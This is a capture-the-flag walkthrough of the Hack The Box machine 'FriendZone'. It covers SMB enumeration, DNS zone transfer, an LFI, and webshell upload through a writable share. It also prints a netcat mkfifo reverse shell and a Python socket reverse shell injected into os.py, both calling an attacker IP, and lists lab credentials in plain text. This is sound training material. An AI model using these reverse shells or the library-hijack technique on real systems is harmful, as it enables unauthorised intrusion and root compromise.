Skip to content

Latest commit

 

History

History
198 lines (101 loc) · 3.18 KB

README.md

File metadata and controls

198 lines (101 loc) · 3.18 KB
Raw

FriendZone

rustscan 10.10.10.123

Alt text

Let's do nmap scan for open ports.

nmap -sC -sV -p 21,22,53,80,139,443,445 10.10.10.123

Alt text

Let's enumerate SMB shares.

smbmap -H 10.10.10.123

Alt text

Let's connect to 'Development' share., we don't find anything useful.

smbclient -N //10.10.10.123/Development

Try to join 'general' share.

smbclient -N //10.10.10.123/general

and We find admin credentials..

Alt text

admin:WORKWORKHhallelujah@#

Let's search for subdomains via 'dig' tool.

dig axfr friendzone.red @10.10.10.123
dig axfr friendzoneportal.red @10.10.10.123

Alt text

Let's add this domains to our '/etc/hosts' file for resolving purposes.

Alt text

For https on 'administrator1.friendzone.red' , I see login form, I use 'admin:WORKWORKHhallelujah@#' credentials and I can login.

I am on Dashboard page.

Alt text

Let's do directory brute-forcing.

gobuster dir -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php -k

Note: -k option for gobuster to skip TLS verification.

Alt text

Here, I found LFI and see that

Alt text

Let's read source code of application.

Alt text

Alt text

We can grab also 'upload.php' file.

Alt text

I see from source code, that I need to add my webshell into SMB Share which I found before. (have write ACCESS to 'Development' share)

I upload my webshell into share.

smbclient -N //10.10.10.123/Development -c 'put cmd.php dr4ks.php'

Alt text

I can execute commands via web shell, I uploaded into SMB Share.

Alt text

Now, it's time tp add reverse shell to command and get shell.

Reverse shell payload:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.16.4 1337 >/tmp/f

Alt text

Alt text

I spawned interactive shell.

python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo ; fg

Put some modifications

export TERM=xterm
export SHELL=bash

I found clear-text credentials of 'friend' user.

Alt text

friend: Agpyu12!0.213$

user.txt

Alt text

Here, I see and investigate '/opt/server_admin/reporter.py' file that runned by root for every 2 minutes (identified by pspy64 tool)

While reading this file, 'os' library is used for executing commands, I can exploit this vulnerability.

Alt text

Let's add reverse shell into '/usr/lib/python2.7/os.py' file.

import socket
import subprocess
import os


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.4",1337))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Alt text

root.txt

Alt text